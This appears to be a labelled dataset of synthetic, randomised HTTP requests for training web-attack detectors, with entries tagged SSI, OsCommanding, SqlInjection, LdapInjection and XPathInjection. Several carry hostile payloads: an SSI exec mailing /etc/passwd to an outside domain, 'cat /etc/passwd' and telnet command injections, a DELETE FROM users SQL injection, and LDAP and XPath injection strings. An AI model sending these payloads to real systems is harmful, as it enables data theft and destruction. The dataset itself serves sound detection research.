GET /iqtPHIKRr29ePG4jzUa/oiX6_DdJPTaSZVgRiFgJ/Vyuq9l/Ihnl4p7/Pdb1RFb/pagcantotyilUpgi6nee/3mBCWLymb6zjojRpX/a2/o4Loaregabh/aHlUJ5/dhglsa3toIi2iloe.htm?ne8esuel=t+rg%3ArsorE1t&ereqya9ezx=5connectittho%26%2F%27+xs&rmoh=ke%29%28+++%7C++++%286fud%3D*%29&ec6d=aasu&2zfzeeaneeaot=140&Sbetween@pMAy1jHk=aQKILsY&srft1e0issc=n8osneg2jdrssyahne&senstree7nto=740816381&afaudw7rtnSo=e1w8w HTTP/1.1
Host: www.Esnntet.it
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: eim-90aT
Cache-Control: no-cache
Client-ip: 159.233.41.170
Cookie: WaaeSwOiCtogA9n=otad;iic=tSSzKnjlbQ4X;IEeyiTa2zohyot=+n;5eoaseeh=3974142
Cookie2: $Version="12"
Date: Mon, 09 Jul 07 12:25:28 UTC
ETag: W/"tPQ1V2111a4tmCmWTe"
Expect: 100-continue
From: yoqtrue@reaT2e.be
If-Modified-Since: Fri, 14 Oct 05 21:57:25 CET
If-Unmodified-Since: Sun, 24 Sep 06 16:01:19 UTC
If-Match: *
If-None-Match: "-rvKKPRd4m.3LtdxY"
If-Range: "0tws3ITxulaOK84XSM"
Max-Forwards: 1436
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: NTLM SWhyYWEwZXJOR29UdG5pOGh3c3JhYWRyb2pvbkw1c2VycHU=
Authorization: Basic bWVsZmJwOm9ucmU=
Range: 183458-,10781-99705
Referer: /fSsOow8.jsp
TE: trailers
Trailer: Accept-Language
User-Agent: 20ere/4.0
UA-CPU: StrongARM
UA-Disp: 303,353,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 617x3755
Via: 4.6 116.172.55.131, lDofha/8.0 www.sest.js, HTTP/4.7 16.151.11.180:16
Transfer-Encoding: gzip
Upgrade: hzs/8.1, Sct/5.2, 1jwo4/3.2, u0ie/8.6, lheiu/9.7
Warning: 068 www.caus6t.html:451 "nAiwBaHg" 
X-Forwarded-For: 203.59.253.98
X-Serial-Number: 130460
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37153
Start - Id: 40332
class: SSI
GET /DuieSneyasgharhy/th28e6pMoy/4uo_XI5/B3Nvliked7.tC/w5KLGZrcpiframeYxz/n9ticeioeeiln/5IPB4-618E/dropiHjaNEItrQE/ecLLXmfZKmA-G5L_6D/ch4l_s59wW8sreOe.nV/vuZ8U0AtkDDo52Gdmkgd/ZyFb9-rV.pl?tourcsnetDp1Eet=delErsueY%3B5tHnx&JVv3kAqqbodyaT=1bsenRlhv2xl&8a=%5Bwinntu3e%3Cppps6rUbhw&sLurs=%253h&ysvnrlnu7=ifja2tthRNs3ik&smSlpoouan=n%40g8Qm_I&layef=h0aI%24shutdowneiddocumentRosd+opassthru+dnh&LWqxFGD=28&ttM=ci&utfnieai=sZGIW&yailaotq4Wttre=ebsWyq9CMhi.&z3object9hZ0KCE=%3C%21--+++++%23exec+++cmd%3D%22c%3A%5Cprogra%7E1%5C1ut%5CtHSse%5Ciu.exe+d%3A%5CnetGfnqe%5Cwww.nitichleni.org%5C70oitbm%5Cdatabase.mdb+++%2Fx+++++exporttofoxpro%22--%3E HTTP/1.0
Host: 248.173.88.107:80
Connection: keep-alive
Accept: audio/basic, image/*;q=0.0, video/*;q=0.5
Accept-Charset: *
Accept-Encoding: deflate;q=0.0, compress;q=0.8, compress
Accept-Language: *
Client-ip: 227.85.148.49
Cookie: h45odtir4c=894334;yre3eaakJyQm=4394;narNtC=c;nhSrecswcsqnT8=noeepkalrt3ao1
Date: Fri, 28 Jul 06 23:49:42 GMT
ETag: "-2SnMmPGNUPDo6afli"
If-Modified-Since: Tue, 03 Feb 09 19:11:07 UTC
If-None-Match: *
If-Range: "F22Ya1-JPXi289EQ_p"
Max-Forwards: 1663
MIME-Version: 0.7
Pragma: no-cache
Authorization: NTLM Nm9lYU5pa0xuMnRmbHNlNzJlZ2VmM29UUGVhYXllcG8=
Range: -636724,210954-
Referer: http://ieito.cz/l8i8skc/s2no.jsp
TE: deflate;q=0.6,gzip
User-Agent: t6rctlgtcirnma8
UA-Disp: 041,313,32
UA-Pixels: 6151x427
Transfer-Encoding: identity
X-Serial-Number: 22985

null

End - Id: 40332
Start - Id: 40081
class: SSI
GET /cceyCret/8Z255L@b2SdKb/xanLlD/c0mdIA9y5eErfKPkR/9T.4--GsR52B.nsf?mroflomna0ca=5601&d1ama=ara0d%7CsformrfE%25E&u1PiyX=avfY5&sAbgos5qatAYtoe=%3C%21--+++%23exec++cmd%3D%22%2Fbin%2Fmail+++++oeEE.com+%3C++++%2Fetc%2Fpasswd%22--%3E&ic5easoao=scjesqttyy8orrdc&oist=g+%27m&ymas2wsde=otibd6nbnld&lom8so9=%7Eis&S0urG=wiRNtsGK5&.OMK8from.=8ietzceSyroigarn&Oe=39095399 HTTP/1.0
Host: 31.0.194.71
Connection: keep-alive
Accept: application/x-tar;q=0.9, video/*, application/*;q=0.7
Accept-Charset: iso-8859-6, gb2312;q=0.2, macintosh;q=0.5, windows-1253
Accept-Encoding: identity;q=0.9, identity
Accept-Language: *
Cache-Control: min-fresh=324
Client-ip: 53.190.46.19
Cookie: eiA=43;LAguYcBQ9Yib=4967007
Cookie2: $Version="080"
Date: Wed, 27 Jun 07 02:33:01 UTC
ETag: "zpw2OwFuO-yaWgtlF9eB"
Expect: 9fca=ulatc;2dTfm8
From: hbdwf2hh@oEzag3e7.de
If-Modified-Since: Sun, 23 Aug 09 23:08:47 GMT
If-Unmodified-Since: Tue, 21 Oct 08 01:50:14 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 09 Mar 09 18:51:34 GMT
Max-Forwards: 957
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: mshe trCer=de1seo
Authorization: Digest response="bBaDC5A1c6A83fFc4Dd244BD3E63Bf6F"
Range: 4-,3-,-4
Referer: http://www.tlcs.st/oroc2twl.exe
TE: chunked,trailers,deflate
Trailer: Transfer-Encoding
User-Agent: e3esnE/5.1.5.2.8
UA-CPU: PowerPC
UA-Disp: 3467,475,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 0944x596
Via: HTTP/9.3 249.51.212.194, FTP/5.4 www.hf3oyro.html
Transfer-Encoding: Redce
Upgrade: uts3/8.2, hd4uvh/2.4, a6sol/2.3, yce/9.7, cnsH/1.9
Warning: 187 www.s2nfht.shtml "Idhcekl" 
X-Forwarded-For: 133.223.4.65
X-Serial-Number: 9018401167222078
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40081
Start - Id: 43034
class: OsCommanding
PUT /homeAS-nD_m-75/2oya3.exe? HTTP/1.1
Content-Length: 62
Content-Language: a4mf,tnbeIe,hDbeg
Content-Encoding: identity
Content-Location: http://4o5ehbce.com/3itvnt.pl
Content-MD5: em1zbmV6ZWVqOGo0dGRpcw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 21 Sep 09 09:06:14 CET
Last-Modified: Wed, 25 Nov 09 02:51:28 GMT
Host: www.ohfsmshe.ch:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: gzip;q=0.4, deflate;q=0.5, gzip
Accept-Language: *
Cache-Control: vdhtuUn='HeOe'
Client-ip: 65.119.102.85
Cookie: fhnzmldmaen9lfo=68;ai4aeha=eNaTifOUG;tFpr3s=bqapU\aaiWnhLid;Nhvo7nrnnhnt=k7.a5fj4sh4a
Cookie2: $Version="6"
Date: Thu, 27 Jul 06 14:12:53 UTC
ETag: "AlUxBRc1lFh7_IbRVoc"
Expect: 100-continue
From: VsNdtdt@rdorILi.de
If-Modified-Since: Sat, 10 Apr 10 24:23:53 CET
If-Unmodified-Since: Mon, 07 May 07 24:31:59 CET
If-Match: "2kQ@kSxpFdV4@fPXi1x"
If-None-Match: *
If-Range: Sat, 12 Jan 08 10:38:17 CET
Max-Forwards: 567
Pragma: no-cache
Proxy-Authorization: Digest opaque="ais18i"
Authorization: Digest realm
Range: -98633,070828-,-9277
Referer: /osemjl/nretrH/2mnmouR.tiff
TE: gzip;q=0.5,deflate
Trailer: Connection
User-Agent: Mozilla/3.4 (Windows; U; WinNT 7.7; ee-ie; rv:0.6.8) Gecko/75179717
UA-CPU: Sparc
UA-Disp: 575,612,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2695x320
Via: 7.6 www.w8es.html
Transfer-Encoding: gzip
Upgrade: 6CozN/5.3, aqmg/9.3, yryyou/0.4, eket/6.8, aiea/8.2
Warning: 949 www.umlpttl.html:72 "q3sco" "Sat, 17 Jul 04 20:43:31 GMT"
X-Forwarded-For: 225.126.234.64
X-Serial-Number: 4857297063808
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

formSqaqo="   ; telnet    196.11.20.251    80;&hWBX=emao

End - Id: 43034
Start - Id: 41453
class: SqlInjection
PUT /ouSmendoetjdt4s/F1v6CR/ftAszopldJuhetIcltt.mdb? HTTP/1.0
Content-Length: 157
Content-Language: hudTesis,ets
Content-Encoding: identity
Content-Location: /hqvf.ace
Content-MD5: ZWhlbVJld3dyZWlpdGV5YQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 04 Jan 04 10:14:03 GMT
Last-Modified: Mon, 05 Apr 04 16:58:21 GMT
Host: www.inrar.ch
Connection: keep-alive
Accept: video/quicktime;q=0.1, text/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 29.250.237.27
Cookie: ssfltmtevyLm=ntn1exeepaD6er;4ws13gasaI=aa0diFs8ejnoa
Cookie2: $Version="17"
Date: Tue, 11 Oct 05 10:30:27 CET
ETag: W/"0T-9MndUn8_eYiCf9G8s"
Expect: 9andtaCf=tTse
From: svetgtH@ellbmBnam.fr
If-Modified-Since: Sat, 17 Jan 09 03:23:13 UTC
If-Unmodified-Since: Thu, 12 Jan 06 10:48:15 CET
If-Match: *
If-None-Match: *
If-Range: "A6dE0CMJSLmqFf1d"
Max-Forwards: 99
MIME-Version: 2.7
Pragma: nren='eyd'
Proxy-Authorization: Digest uri=http://www.qaseCc.net/doze/ikttvm/5wrye.js
Authorization: Basic cndpdDo3MHNqYXc=
Range: 863-,45-,1-
Referer: http://www.e9neinc.st/as2wsTi/othNadj.mdb
TE: deflate;q=0.2
Trailer: Expect
User-Agent: drb4eers/7.7.8.3.2
UA-CPU: MIPS
UA-Disp: 338,3350,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 254x5165
Via: Wns/7.5 www.shdanli.jpg
Transfer-Encoding: utnba
Upgrade: oin5s/2.1, itrt/4.7, tsm/7.1
Warning: 500 www.ahpvda.gif "wpsouzhnbeu6jkz5A" "Sat, 07 Oct 06 04:07:23 UTC"
X-Forwarded-For: 12.79.200.187
X-Serial-Number: 9168693821015244526
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

2af2=71&xW-bodyx@QLwSzi=usynitdeoRdT&ahedeg=ntn&xebomr=jcbsf');  DEL/**/ETE  FROM users   WHERE     upper(username)   =   upper(   'admin

End - Id: 41453
Start - Id: 39146
class: SSI
GET /yC5f3jw/vMdiVYnuG6v87YpKYA_H/aCw@VG-/brn/sX7S/9Ws8tV2BiT4/nR/ethpmaees0N2u/grmc3erleetas4ehN3ms/oH4.asmx?gi8ia92b=0801&poonnm4e=2&xt=53349&aoeeropme=iNlu2PNRDR&w2=9idhcf&nrnmHtx=e1Ov4&eOlesiEel=47&ilisfIdds=cirdmujdinpfet3of HTTP/1.1
Host: 206.116.158.134
Connection: close
Accept: */*
Accept-Charset: x-mac-arabic, windows-1255, x-mac-korean;q=0.3, windows-1253;q=0.5, x-mac-cyrillic;q=0.4
Accept-Encoding: <!--#echo var="date_gmt"-->
Accept-Language: kirTm-tzavht;q=0.1, 6ehHs-dspAs;q=0.9, nqroana-g
Cache-Control: max-age=9323
Cookie2: $Version="4"
Expect: rxnu=oa8tmb;s0ss=Nh0Ltdc
If-Unmodified-Since: Mon, 24 Dec 07 10:48:05 UTC
If-None-Match: "nhJXk9PQjvOm1q@mt0uC"
Max-Forwards: 1221
Pragma: no-cache
Referer: /naulnca/oednanS.html
User-Agent: Mozilla/5.1 (Windows; U; Windows NT 5.0; sp-co; rv:1.0.0) Gecko/48756253
UA-OS: Windows NT
Via: 0.5 www.abt2ta.shtml:4
X-Forwarded-For: 39.79.189.0
X-Serial-Number: 2130294622393223407

null

End - Id: 39146
Start - Id: 40599
class: SSI
GET /epoemndehapaob/htfftx3pheircnbyRtrs/ohbhRlyomfsatre/a98beirydgt/sh/SgnmnVwindow.openDS/3b/lrAmwVr/kn.mdb?auddrlant=ToAsxmloehio&xWm9Eanirm7h=sanlib%2FcHd%7Esdeobject5neiys&Ln=797&lbAkSX=ttA&6ceqehbetorwes=Ddkahe&Ngitr=13660&ra=nnb&WBHy6XRJQ=81&86uos6agsaa=203&tNreltops7a=swmGhl16I84x&capiob=%3C%21--+++++%23include+++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22++--%3E HTTP/1.0
Host: www.elax.de
Connection: u3es
Accept: audio/*, video/*;q=0.6, audio/x-wav
Accept-Charset: windows-1255;q=0.1, x-mac-japanese
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: max-age=884
Client-ip: 138.235.7.239
Cookie: tcaps4ihdtee=24628
Cookie2: $Version="712"
Date: Mon, 27 Oct 08 08:20:19 CET
ETag: W/"bb110ijb0AjJQj0"
Expect: 9gxdt=coclO
From: sr3e@detdicya.fr
If-Modified-Since: Mon, 31 Jan 05 14:52:04 GMT
If-Unmodified-Since: Mon, 16 Oct 06 23:28:42 GMT
If-Match: *
If-None-Match: "ofWnCgOYLd72XRTJ"
If-Range: ".hirn7vA8bFml_5T2"
Max-Forwards: 4
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Digest algorithm=ekoie
Authorization: whMr s2snl=ehN7tod
Range: 67529-
Referer: /yxeh9/n7tts/jmon/Scineth.asp
TE: chunked;q=0.0,deflate,gzip
Trailer: Warning
User-Agent: dno2hhMe0/8.9.6
UA-CPU: PowerPC
UA-Disp: 953,006,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 7337x662
Via: HTTP/5.3 www.Eonl.tiff, 0.8 7.129.170.112, 5.1 www.aepauy.tiff
Transfer-Encoding: gzip
Upgrade: sez4st/8.2, mnseuu/1.0, fszf/8.0
Warning: 305 210.240.173.34 "ntioprsmAicmwedcere" "Sat, 11 Dec 04 18:18:56 UTC"
X-Forwarded-For: 142.48.24.138
X-Serial-Number: 69115
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40599
Start - Id: 40943
class: SSI
GET /kSVLE_skQIJKki8ZWhxk/t7drcp@diG2TIzP8/ZMtKyIxkGrm5/iE84/atMejxs4qvesg9HQ8Nt/Q5mNnE./to@0lQ6hOQOVJ0rkcNG/WwZmaOsock_streamLwly/gaW3R/5kclKcdHMgG3Gw7o.php3?lutb8nle2tsaN=9&1r=tEetHionr-+m8&nOtsJt81hw9p3=Slt&vaw6h=%26asmnm&rhdsNneuecH0i=u20&BXVUR=70635587&v1J5wp-xml=54&UTscriptKYhttpskdp0nph-=tdt_AM9dCup&artoptatanaqtte=%3C%21--++%23odbc++++statement+%3D+++%22select++oc1%2C+++3ss2tbi%2C+++++g3tsaib+++++from++E8eNms++order+++++by+++5%2C+58%2C+2%22+++--%3E&mc778rR0u=0166018602&N@Fx=euo%3Afi&tezp=p7Dli HTTP/1.0
Host: www.ncanit7I8i.it:7138
Connection: close
Accept: video/mpeg, video/*;q=0.0
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: min-fresh=4
Client-ip: 231.113.175.243
Cookie: trp3eo1fmlvb3=oppeteboot.inibintely%SpasswdOue;f61brhielnOwS=%=divt;aieNels9sto=t;sehsmyt4=vraxhavingioN 7hml nhttpsallpositiono
Cookie2: $Version="091"
Date: Tue, 06 Oct 09 06:21:42 UTC
From: tden@6whrtlriEc.ch
If-Modified-Since: Tue, 16 Aug 05 08:58:56 UTC
If-Unmodified-Since: Wed, 26 Dec 07 03:13:48 CET
If-Match: "CXoL5WdS9.u_jzQyj3q8"
If-None-Match: "O9g9H39mjsVeEv3uPV"
If-Range: *
Max-Forwards: 9
Proxy-Authorization: Basic ZW9jbm5zMjpIMUppY3Js
Authorization: Basic cGNnZTprc3Nmb2Uw
Range: 3754-,869645-
Referer: /knLdetow/jer8.mpeg
TE: trailers,trailers
Trailer: If-Match
User-Agent: stb7iaos/2.4.7.9.3
UA-CPU: MIPS
UA-Color: color8
UA-Pixels: 877x4813
Via: 4.8 www.rlet.jpg, 9.4 www.ekEo.png
Transfer-Encoding: identity
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40943
Start - Id: 38723
class: LdapInjection
GET /rMe3UG/aERgpi/oP6vzN.IHTQV/oO44ww@4w-L8.jpg?eooN=9654513&f0f5J=ydmhIb&t4AAclNvjtwmir=683121950&YRaAq5MW=lOn%29%28%26%28objectClass+%3D+++gteU*%29&q0imfEta=+stvho8&tarPenstsaibjay=e%3A HTTP/1.0
Host: www.Uad6w.org
Connection: close
Accept: audio/x-wav;q=0.1
Accept-Charset: macintosh;q=0.9, iso-2022-jp;q=0.1, x-mac-arabic
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 132.55.39.12
Cookie: vlikeiPu8XJ=7uSjuWd.;pmfOls0LT7=1esJ8w;8nh=q
Cookie2: $Version="8"
Date: Sat, 19 Nov 05 04:06:21 CET
ETag: W/"w@9jvwhO5MuGi9i"
Expect: dv2os
From: ilrb@h5ihiwr.cz
If-Modified-Since: Mon, 29 Nov 04 22:22:39 GMT
If-Unmodified-Since: Tue, 22 Sep 09 17:56:10 GMT
If-Match: "AEFRn_BfxVQKRWtDbZI"
If-None-Match: *
If-Range: *
Max-Forwards: 94
MIME-Version: 7.8
Pragma: ggn='wI3hn'
Proxy-Authorization: Digest algorithm=pssp
Authorization: Digest realm
Range: 5873-
Referer: http://www.da1r.de/oLwdz/eGab/ewexae.msf
TE: trailers
Trailer: If-Range
User-Agent: zlshislsom/9.0.1.4
UA-CPU: 68000
UA-Disp: 281,271,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 094x3377
Via: 7.3 79.47.162.18
Transfer-Encoding: deflate
Upgrade: ei1/2.0
Warning: 792 57.164.145.223:2 "o6u6iwaenei" "Thu, 08 Oct 09 12:11:05 UTC"
X-Forwarded-For: 18.156.103.46
X-Serial-Number: 89253590
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38723
Start - Id: 35018
class: SSI
GET /tQ/eearprssetSnahle4s/eNbi/mheycsnmoebdabonq/pgkbmCY/e2xzz./4wLarhs/tnTSnnnkrhaatml/iH7W7t4X6PwCEbEPRJEB/@KT.sh?tXi0aO=1205&yeth0ocsd=mezVEm6S.&8p9=sHFC&at8imt=HReaa&7divqkf6htpassZI=lnxld%25s%28l%3Brih&e7bVeIboot.ini=%3C%21--+++%23odbc+statement+%3D+%22select++1ces%2C++++ca%2C+mcrni9a++++from++eimg++++order++++by+8%2C++96%2C+++6%22+++++--%3E&tmpf_dV=n3s HTTP/1.1
Host: 42.74.114.99:13616
Connection: close
Accept: */*;q=0.1
Accept-Charset: koi8;q=0.9, euc-kr, x-mac-ce
Accept-Language: kR-apgo
Cache-Control: max-age=16
Cookie: u4bNXM55N1s=ix;Eyc6MG@and4=16433;ihedathrceet=oall;BnoUeinrlsdrRn=mwindow.openclor
Date: Sun, 27 Aug 06 20:36:32 GMT
ETag: "ACkBovqa6jw8LirvL7J7"
Expect: aebinisw
If-Modified-Since: Mon, 25 Jun 07 10:49:35 UTC
If-Unmodified-Since: Sat, 23 Sep 06 17:23:21 GMT
If-Match: *
Pragma: o81eyca='n'
Proxy-Authorization: Basic cjdlYWk6ZWkwYzdB
Referer: http://ohrca.uk/dbE1eeE4/bcrgeemo/4eio/onfyeZ.dll
Trailer: Via
User-Agent: Mozilla/2.2 (compatible; MSIE 1.4; Win 9x; himdTojn)
Via: 8.6 www.a1sr.css
Warning: 670 90.192.133.231 "telxe" 
----: -----------------------------------------

null

End - Id: 35018
Start - Id: 38830
class: LdapInjection
GET /lprda9drrnqolph/kn/ramu5ho4l4mA8r/octtcug/mFITIDfVFtcc6./hitrugeds/tpSDTDK.4T3yv8.0tiI.nsf?o4eeOitgrecjtkl=83&pephdt=tceeyt&EIsoaeuabdi=ulZ2nEiod&aii=documenthtacces&gftws0sltr=+o6&a3mOo42issrtu=9657&3Easetnd=481&hrtasionasiuuz=6ebpE8crE6n14loteu&aeogc=e+&gtmirimi=ttr%5DoMoTbte%7Eeupdatesystemfe4c&hthdl=3sv&iesnle=sgl%29%28%26%28objectClass+%3D+++isei*%29&u9ga=rsRVt%40N&egsl8eatisent=l4nwp-%3Chuoeno5lEjf0jg6 HTTP/1.1
Host: 199.25.132.84
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: iso-8859-15;q=0.1, koi8-r, iso-8859-8-i
Accept-Encoding: deflate, deflate;q=0.4, compress
Accept-Language: *
Cache-Control: no-transform
Client-ip: 147.81.36.108
Cookie: snevOhqnc0wm=itHirhsrahttpseui;3nhoc65by=hn2YgII;Umt=7439213969;irlpm8tcIcptrpr=dzo4;lfshixa=1ltd ERk 
Cookie2: $Version="4"
Date: Sun, 30 Nov 08 13:46:54 GMT
ETag: ".E54oRpEfAdmv5Espqw"
Expect: 100-continue
From: hth4s@nafohliad.be
If-Modified-Since: Mon, 24 Sep 07 17:18:19 CET
If-Unmodified-Since: Sun, 17 Jan 10 07:44:55 GMT
If-Match: *
If-None-Match: "8mdIMWuq4Ksbg@kn@pR3"
If-Range: "C8uIZy8BQ2Svtorr"
Max-Forwards: 3543
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Basic ZXh1YU9vOkJyYXVmSTQ=
Authorization: Basic OWF0ZWluOmNlempoYWY=
Range: 088-865,-53,38290-
Referer: http://reeaw7.uk/5hz9mdh.conf
TE: trailers,trailers
Trailer: If-Range
User-Agent: iwnc/9.8.8.3.0
UA-CPU: MIPS
UA-Disp: 0767,501,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 8161x590
Via: aluse/4.0 www.pieo.css, FTP/9.2 53.125.135.140:7, HTTP/6.9 www.z5Nh.htm
Transfer-Encoding: compress
Upgrade: 5e2/8.1, neual/2.6, shex0/3.0, srtfSe/9.7
Warning: 025 www.snltrm.tiff "tuatoroypwbr" 
X-Forwarded-For: 19.112.51.121
X-Serial-Number: 323337935267147
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 38830
Start - Id: 36711
class: OsCommanding
POST /eE8qkq/q9Vl_oYCaPOJo3.php3? HTTP/1.1
Content-Length: 57
Content-Language: meanio,errHs
Content-Encoding: compress
Content-Location: /qTpi.mspx
Content-MD5: dGlpaHRubXN0eG9yRXNGaA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 08 May 05 02:24:07 UTC
Last-Modified: Wed, 17 Mar 04 02:09:59 UTC
Host: www.irofeef.gov
Connection: close
Accept: */*;q=0.6
Accept-Charset: *;q=0.6
Accept-Encoding: gzip
Accept-Language: Ceoinkls-r25ao, srs5snpn-re0ebHso
Cache-Control: min-fresh=95634
Client-ip: 227.141.185.118
Cookie: Zlnetcatiz2.-UF=7031915994;ttteyoeu=07
Cookie2: $Version="087"
Date: Fri, 31 Dec 04 04:03:57 UTC
ETag: W/"LE7CRa2rOJ_8Ht@xs8X"
Expect: ihu8
From: eralt@eApeeioers.de
If-Modified-Since: Tue, 22 Sep 09 18:40:11 CET
If-Unmodified-Since: Tue, 15 Feb 05 21:05:21 UTC
If-Match: "7-dnbTH7T2FyS5NF"
If-None-Match: "ZNscZNigArO5LzN7EJ"
If-Range: Sat, 12 Nov 05 14:23:12 UTC
Max-Forwards: 2
MIME-Version: 9.8
Pragma: i3=lw1n
Proxy-Authorization: ssrr uentet=otetm
Authorization: Basic TmJzVGRzOmVrcW9weWU=
Range: 11-,-3
Referer: http://ep9wpor.gov/H3skqc/6idrpbyt/awlstNey.php3
TE: gzip,deflate,chunked
Trailer: Cache-Control
User-Agent: Mozilla/0.3 (compatible; otIoi7elg; Windows NT; Osnfe2At90; rlyaar; heeoibn)
UA-CPU: 68000
UA-Disp: 1584,454,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 654x545
Via: 2.8 www.yar0.shtml
Transfer-Encoding: deflate
Upgrade: omsr/2.0, rxspop/7.7, osEh/6.9
X-Forwarded-For: 3.19.153.226
X-Serial-Number: 6338056420041835
----: ---------------------------------

RStueo=glanf&ta=cat   /etc/passwd |&edthdr3t=tbRjTT

End - Id: 36711
Start - Id: 50052
class: XPathInjection
PUT /fo5a1ead/uR6ySV3whYBD/a6sVE/u6G2i5ACw/lGn_h/ahgC/uunaysr1tindDjt/e@G0ASy9gazW_V6t/iz-dHJ@yaTTPi37svQ.shtml? HTTP/1.1
Content-Length: 81
Content-Language: da,hr
Content-Encoding: deflate
Content-Location: /uhgr/ia61hn.pl
Content-MD5: RXRNdXVpZ2F3RWhhbDNlZw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 07 Jul 05 11:36:16 CET
Last-Modified: Fri, 11 Jul 08 04:47:36 GMT
Host: 221.229.61.161
Connection: lk7o
Accept: application/x-tar, text/*
Accept-Charset: windows-1254, iso-8859-9, cp-932;q=0.9
Accept-Encoding: *;q=0.0
Accept-Language: leb-iaiU;q=0.1
Cache-Control: no-store
Client-ip: 189.156.251.248
Cookie: mFah=shetce;zmKiframeGKM7=01820;uta1dnciuzt=stosaoe'  or   1<    egrEr/cUunh/o8Ht/child::text()[position()=04]    or   'tah'= ';lezng=npXE;moyqetfmmSpxhNn=aatm1itasc(L
Cookie2: $Version="12"
Date: Wed, 06 Apr 05 06:12:59 UTC
ETag: W/"f6R0H.95mK2Tx@qkNB2"
Expect: arhdseea=sx3so
From: rffjOIp@Tenah9e.be
If-Modified-Since: Sat, 30 Sep 06 07:17:57 GMT
If-Unmodified-Since: Sat, 22 Jan 05 12:57:34 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 8.2
Pragma: R='teorrb'
Proxy-Authorization: Digest nonce
Authorization: Basic ckV6czpuN2VoaGlQdQ==
Range: 857-
Referer: /ecsT5o/oWNir/xme2r7ci.zip
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: eLqMEWeDo http://www.7hseA9.st
UA-CPU: PowerPC
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3705x532
Via: HTTP/4.6 24.244.222.181, 8.7 99.203.237.115
Transfer-Encoding: deflate
Upgrade: smmtk/5.1, mehR/9.1, sydlro/0.9, Tllo/7.7
Warning: 835 51.125.168.202 "mbu7zlntbs2Lbdor" "Mon, 14 Feb 05 09:57:15 GMT"
X-Forwarded-For: 78.250.5.71
X-Serial-Number: 4431106659344342
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

rsPtie=lz352eci&eOoi3oeItoy2n=723334&0oTokttR=aajswerlhbdoly9wa&ovlsqhn=fq?ka0h

End - Id: 50052
Start - Id: 35523
class: XPathInjection
POST /Tg4ox6cwsu/tlCG7Ylovs.FREX6k/la8w0RlCBD9o/dMR/x9KG/union4EAIs0homeok78NC/gPp_Nu9x6nXRQ4S8A30/rxp_QlmetapTI/Zxc6/aW9Li/ee4tltifl.bin? HTTP/1.1
Content-Length: 411
Content-Language: 8smkUo,gs
Content-Encoding: deflate
Content-Location: http://www.htbemq.st/aWia2/yiwttrlS/lgaza.zip
Content-MD5: dGVwcGxtbmV2ZXJ1Y3JlSA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 07 Jun 04 20:40:13 GMT
Last-Modified: Tue, 20 Apr 04 01:58:03 CET
Host: www.flnLe.uk
Connection: cano2
Accept: text/xml;q=0.7, application/zip;q=0.9
Accept-Charset: x-mac-greek;q=0.8, iso-2022-kr;q=0.6, windows-1250;q=0.6, x-mac-japanese, ks_c_5601-1987;q=0.2
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: max-age=496
Client-ip: 108.161.30.112
Cookie: LUboot.iniaOEVy=24472;168sqtrrtolps=erR
Cookie2: $Version="982"
Date: Sun, 25 Jul 04 04:29:47 GMT
ETag: "pjVM2@qz7S7-tpwC"
Expect: Zgse=teneo;otninw=mnsa
From: iSTRreh@vcr3m.net
If-Modified-Since: Sun, 04 Dec 05 22:35:26 UTC
If-Unmodified-Since: Sat, 12 May 07 16:49:45 CET
If-Match: "65vsifuT2uKvnZ-iUT"
If-None-Match: "KEvsj_Yu0hTdM9t"
If-Range: "YvNJPF5qA1zy5Q@z"
Max-Forwards: 80
MIME-Version: 2.0
Pragma: no-cache
Authorization: NTLM cjZpZXdlMnRjaWVubnJzbnBzOWVpZm5paWE4Z2UwaWFJSG9lYg==
Referer: /doOQe4cr/oDcqd/gtni/IbiM/cesapt.mspx
TE: trailers
Trailer: Pragma
User-Agent: lsotieiwhz/1.3.4
UA-Disp: 740,794,8
Via: HTTP/2.0 40.243.44.154, 6.4 www.tnxyl.shtml
Transfer-Encoding: identity
